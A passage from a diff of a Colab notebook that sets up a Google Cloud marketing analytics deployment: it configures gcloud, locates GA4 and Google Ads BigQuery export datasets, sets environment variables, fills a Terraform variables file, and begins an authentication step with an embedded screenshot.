~/.bashrc\n", + "!gcloud projects add-iam-policy-binding {GOOGLE_CLOUD_PROJECT_ID} --member user:{MAJ_DATAFORM_REPO_OWNER_EMAIL} --role=roles/bigquery.admin\n", + "!source ./scripts/common.sh && enable_all_apis > /dev/null\n", + "!echo \"APIs enabled\"\n", + "\n", + "from google.cloud import bigquery\n", + "# Construct a BigQuery client object.\n", + "client = bigquery.Client(project=GOOGLE_CLOUD_PROJECT_ID)\n", + "# Replace with your desired dataset ID suffix\n", + "dataset_id_suffix = MAJ_GA4_PROPERTY_ID\n", + "location = ''\n", + "dataset_id = ''\n", + "# Iterate through datasets and find the one with the matching suffix\n", + "for dataset in client.list_datasets():\n", + " dataset_id = dataset.dataset_id\n", + " if dataset_id.endswith(dataset_id_suffix):\n", + " dataset_ref = client.get_dataset(dataset.reference)\n", + " location = dataset_ref.location\n", + " print(f\"GA4 Dataset ID: {dataset_id}, Location: {location}\")\n", + " break\n", + "else:\n", + " print(f\"No dataset found with ID suffix: {dataset_id_suffix}\")\n", + "MAJ_MDS_DATA_LOCATION = location\n", + "MAJ_GA4_EXPORT_PROJECT_ID = GOOGLE_CLOUD_PROJECT_ID\n", + "MAJ_GA4_EXPORT_DATASET = dataset_id\n", + "\n", + "if MAJ_MDS_DATA_LOCATION == 'US':\n", + " MAJ_DEFAULT_REGION = 'us-central1'\n", + "elif MAJ_MDS_DATA_LOCATION == 'EU':\n", + " MAJ_DEFAULT_REGION = 'europe-west1'\n", + "else:\n", + " MAJ_DEFAULT_REGION = MAJ_MDS_DATA_LOCATION\n", + "MAJ_MDS_PROJECT_ID=MAJ_DEFAULT_PROJECT_ID\n", + "MAJ_MDS_DATAFORM_PROJECT_ID=MAJ_DEFAULT_PROJECT_ID\n", + "MAJ_FEATURE_STORE_PROJECT_ID=MAJ_DEFAULT_PROJECT_ID\n", + "MAJ_ACTIVATION_PROJECT_ID=MAJ_DEFAULT_PROJECT_ID\n", + "MAJ_ADS_EXPORT_PROJECT_ID = GOOGLE_CLOUD_PROJECT_ID\n", + "project_id=MAJ_ADS_EXPORT_PROJECT_ID\n", + "location = MAJ_MDS_DATA_LOCATION\n", + "table_suffix = 
MAJ_ADS_EXPORT_TABLE_SUFFIX\n", + "# Query to find datasets that contain tables with the specified suffix.\n", + "query = f\"\"\"\n", + " SELECT table_schema as dataset_id\n", + " FROM `{project_id}.region-{location}.INFORMATION_SCHEMA.TABLES`\n", + " WHERE table_name LIKE '%{table_suffix}'\n", + " GROUP BY table_schema\n", + "\"\"\"\n", + "# Run the query and fetch the results.\n", + "query_job = client.query(query)\n", + "results = query_job.result()\n", + "# Print the dataset IDs that match the criteria.\n", + "ads_dataset_id = ''\n", + "for row in results:\n", + " ads_dataset_id = row.dataset_id\n", + " print(f\"GAds dataset: {row.dataset_id}, Location: {location}\")\n", + "MAJ_ADS_EXPORT_DATASET = ads_dataset_id\n", + "\n", + "os.environ['MAJ_DEFAULT_REGION'] = MAJ_DEFAULT_REGION\n", + "os.environ['MAJ_MDS_PROJECT_ID'] = MAJ_MDS_PROJECT_ID\n", + "os.environ['MAJ_MDS_DATAFORM_PROJECT_ID'] = MAJ_MDS_DATAFORM_PROJECT_ID\n", + "os.environ['MAJ_FEATURE_STORE_PROJECT_ID'] = MAJ_FEATURE_STORE_PROJECT_ID\n", + "os.environ['MAJ_ACTIVATION_PROJECT_ID'] = MAJ_ACTIVATION_PROJECT_ID\n", + "os.environ['MAJ_MDS_DATA_LOCATION'] = MAJ_MDS_DATA_LOCATION\n", + "os.environ['MAJ_GA4_EXPORT_PROJECT_ID'] = MAJ_GA4_EXPORT_PROJECT_ID\n", + "os.environ['MAJ_GA4_EXPORT_DATASET'] = MAJ_GA4_EXPORT_DATASET\n", + "os.environ['MAJ_ADS_EXPORT_PROJECT_ID'] = MAJ_ADS_EXPORT_PROJECT_ID\n", + "os.environ['MAJ_ADS_EXPORT_DATASET'] = MAJ_ADS_EXPORT_DATASET\n", + "os.environ['MAJ_ADS_EXPORT_TABLE_SUFFIX'] = MAJ_ADS_EXPORT_TABLE_SUFFIX\n", + "os.environ['MAJ_WEBSITE_URL'] = MAJ_WEBSITE_URL\n", + "os.environ['MAJ_GA4_PROPERTY_ID'] = MAJ_GA4_PROPERTY_ID\n", + "os.environ['MAJ_GA4_STREAM_ID'] = MAJ_GA4_STREAM_ID\n", + "os.environ['MAJ_DATAFORM_REPO_OWNER_EMAIL'] = MAJ_DATAFORM_REPO_OWNER_EMAIL\n", + "os.environ['MAJ_DATAFORM_GITHUB_REPO_URL'] = MAJ_DATAFORM_GITHUB_REPO_URL\n", + "os.environ['MAJ_DATAFORM_GITHUB_TOKEN'] = MAJ_DATAFORM_GITHUB_TOKEN\n", + "\n", + "!sudo apt-get -qq -o=Dpkg::Use-Pty=0 install gettext\n", + "!envsubst < \"{SOURCE_ROOT}/infrastructure/cloudshell/terraform-template.tfvars\" > \"{SOURCE_ROOT}/infrastructure/terraform/terraform.tfvars\"\n", + "\n", + "!gcloud config set disable_prompts true\n", + "!gcloud config set project {PROJECT_ID}\n", + "\n", + "from IPython.display import clear_output\n", + "clear_output(wait=True)\n", + "print(\"SUCCESS\")" + ], + "metadata": { + "id": "dMcepKg8IQWj", + "cellView": "form", + "colab": { + "base_uri": "https://localhost:8080/" + }, + "outputId": "77ae4ebb-ffd2-462e-eb6f-d7235e62a4e0" + }, + "execution_count": 2, + "outputs": [ + { + "output_type": "stream", + "name": "stdout", + "text": [ + "SUCCESS\n" + ] + } + ] + }, + { + "cell_type": "markdown", + "source": [ + "### 3. 
Authenticate using application default credentials Google Cloud Platform\n", + "\n", + "Click the ( β–Ά ) button to create your Terraform application default credentials to the Google Cloud Project.\n", + "\n", + "*To complete this step, you will be prompted to copy/paste a password from another window into the prompt below.*\n", + "\n", + "**Note:** *Click on the hidden input box after the colon, as shown below.*\n", + "\n", + "![image (14).png](data:image/png;base64,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lmOlBpeGVsWURpbWVuc2lvbj44NjwvZXhpZjpQaXhlbFlEaW1lbnNpb24+CiAgICAgICAgIDxleGlmOlBpeGVsWERpbWVuc2lvbj4xNzA2PC9leGlmOlBpeGVsWERpbWVuc2lvbj4KICAgICAgICAgPGV4aWY6VXNlckNvbW1lbnQ+U2NyZWVuc2hvdDwvZXhpZjpVc2VyQ29tbWVudD4KICAgICAgPC9yZGY6RGVzY3JpcHRpb24+CiAgIDwvcmRmOlJERj4KPC94OnhtcG1ldGE+CsczRksAAAAcaURPVAAAAAIAAAAAAAAAKwAAACgAAAArAAAAKwAADGj5TTX4AAAMNElEQVR4AezdfagVZR4H8N/dG1viir0Q3cBNEWvTXEwC0VyKjWqDalnpxbIytzUX1t61oIRkQY0gCTb3v922NhARMYv+UbOyXK3I+sN8WRCx1j+ENvFly9TU7RnyeO+5Vz3Xe86Zcc5nQO6cmWfmeZ7PPPfMdb5n5rQd/WEKEwECBAgQIECAAAECBAgQIECAAAECBAgQIECAAIEmC7QJqposrjoCBAgQIECAAAECBAgQIECAAAECBAgQIECAAIFMQFBlIBAgQIAAAQIECBAgQIAAAQIECBAgQIAAAQIECOQiIKjKhV2lBAgQIECAAAECBAgQIECAAAECBAgQIECAAAECgipjgAABAgQIECBAgAABAgQIECBAgAABAgQIECBAIBcBQVUu7ColQIAAAQIECBAgQIAAAQIECBAgQIAAAQIECBAQVBkDBAgQIECAAAECBAgQIECAAAECBAgQIECAAAECuQgIqnJhVykBAgQIECBAgAABAgQIECBAgAABAgQIECBAgICgyhggQIAAAQIECBAgQIAAAQIECBAgQIAAAQIECBDIRUBQlQu7SgkQIECAAAECBAgQIECAAAECBAgQIECAAAECBARVxgABAgQIECBAgAABAgQIECBAgAABAgQIECBAgEAuAoKqXNhVSoAAAQIECBAgQIAAAQIECBAgQIAAAQIECBAgIKgyBggQIECAAAECBAgQIECAAAECBAgQIECAAAECBHIREFTlwq5SAgQIECBAgAABAgQIECBAgAABAgQIECBAgAABQZUxQIAAAQIECBAgQIAAAQIECBAgQIAAAQIECBAgkIuAoCoXdpUSIECAAAECBAgQIECAAAECBAgQIECAAAECBAgIqowBAgQIECBAgAABAgQIECBAgAABAgQIECBAgACBXAQEVbmwq5QAAQIECBAgQIAAAQIECBAgQIAAAQIECBAgQEBQZQwQIECAAAECBAgQIECAAAECBAgQIECAAAECBAjkIiCoyoVdpQQIECBAgAABAgQIECBAgAABAgQIECBAgAABAoIqY4AAAQIECBAgQIAAAQIECBAgQIAAAQIECBAgQCAXAUFVLuwqJUCAAAECBAgQIECAAAECBAgQIECAAAECBAgQEFQZAwQIECBAgAABAgQIECBAgAABAgQIECBAgAABArkICKpyYVcpAQIECBAgQIAAAQIECBAgQIAAAQIECBAgQICAoMoYIECAAAECBAgQIECAAAECBAgQIECAAAECBAgQyEVAUJULu0oJECBAgAABAgQIECBAgAABAgQIECBAgAABAgQEVcYAAQIECBAgQIAAAQIECBAgQIAAAQIECBAgQIBALgKCqlzYVUqAAAECBAgQIECAAAECBAgQIECAAAECBAgQICCoMgYIECBAgAABAgQIECBAgAABAgR6LbBz587o6OiobPfZ1n2xbO1X8eHmPfGfr76Lw4ePVtaZIUCAAAECBIop0N7eFj+/8JwYO3xg/O7qC2P0sAGVhlaf6ysr6jwjqKozqN0RIECAAAECBAgQIECAAAECBFpNYPY/t8Wid3e2Wrf1lwABAgQIlE7grl93xJ8nD21qvwRVTeVWGQECBAgQIECAAAECBAgQIECgXAJ/mL8p1ny+u1yd0hsCBAgQINDCAr8aeW78fcaIpgkIqppGrSICBAgQIECAAAECBAgQIECAQLkE3ElVruOpNwQIECBA4JhAM++sElQdU/eTAAECBAgQIECAAAECBAgQIECgZoH0nVR3zd3QpfwVQ34W0387KMZfcW6c89OfdFnnBQECBAgQIFA8ge8OHol/bdwdf31zR2zc/r8uDVw065ddvrOqy8o6vhBU1RHTrggQIECAAAECBAgQIECAAAECrSJQfTdVCqkWPj1SQNUqA0A/CRAgQKBUAimwmvTc513CqmbdVSWoKtVQ0hkCBAgQIECAAAECBAgQIECAQHMEfvP0Z7F95/5KZYc2zI8j/10f27dvrywzQ4AAAQIECJw5Aqs+2
xV/+suWSoOHdPSL5c+Nrrxu1IygqlGy9kuAAAECBAgQIECAAAECBAgQKLHAiKnr4vDho5UeHlg9JeLIQUFVRcQMAQIECBA4swTSXVWj/vhhpdHt7W2x6W/jKq8bNSOoapSs/RIgQIAAAQIECBAgQIAAAQIESizwi9+v7dK7A+9Oyl67o6oLixcECBAgQOCMEqg+v//7H1c3vP11CaqOHj0ae/fujYEDBza8wa1Uwfr162PLli2xY8eOOHDgQNb1/v37x4wZM2piWLlyZWzatCkrO2XKlFyOz549e+KVV17J2jBixIi44YYbamp7XwrNnTv3h090HY6Ojo6YNm1aX3bV0G137doVCxYsyOoYPXp03HrrrQ2tz84JdBZYuHBhbN26Ndra2mLmzJnRr1+/zqvNF0jg5Zdfjn379sWAAQPigQceOK2W7d69O9asWRNffPFFpPeedN5O08033xxXXXXVKfeZx3v5KRuVY4EinF9z7H7hq3Z+LfwhqrmB9f5dK8rYeP3112PDhg2Zw6OPPtq0v9E3b94cK1asyOq98cYbY/jw4TUfCwXLIXDkyJGYN29epJ+DBg067b8ryqGhF/USqL6QJaiql6z9ECBAgACB/ASqz++FDqq+//77LID46KOPYu3atfHNN9/EBRdcEOPGjYtrr7027rjjjvwkz/Ca9+/fH4899lgsX768W09SULVx48Zuy3ta8MQTT8TSpUuzVe+8804MHTq0p2INXbZt27a47rrrsjomTJgQL774YkPrSzsfMmRIVsell14a6QJHUacUElx//fVZ826//fZ44YUXitpU7SqhwOTJk+P999/Pevbpp5/G+eefX8JelqNLKUj6+uuvozfv/517vmrVqnjkkUey83Tn5Wl+zpw5ce+991Yv7vY6j/fybo0o0IIinF8LxFG4pji/Fu6QnHaD6v27VpSxkcKpN954I3N57733Kn+7njZUjRsuXrw4nnrqqaz0888/HxMnTqxxS8XKIpD+Dz9s2LCsOyNHjoy33nqrLF3TjxwFqi9kCapyPBiqJkCAAAECdRKoPr8XNqhKQcrDDz8cb7/99gm7fv/998ezzz4b7e3tJyxjRc8CL730UsyfP7+y8uKLL85CwLTgvPPOi9dee62y7mQz9f7P/cnqOtG6PC5uCqpOdDTKs/y+++6LDz74IOtQ+nRwK98N9PHHH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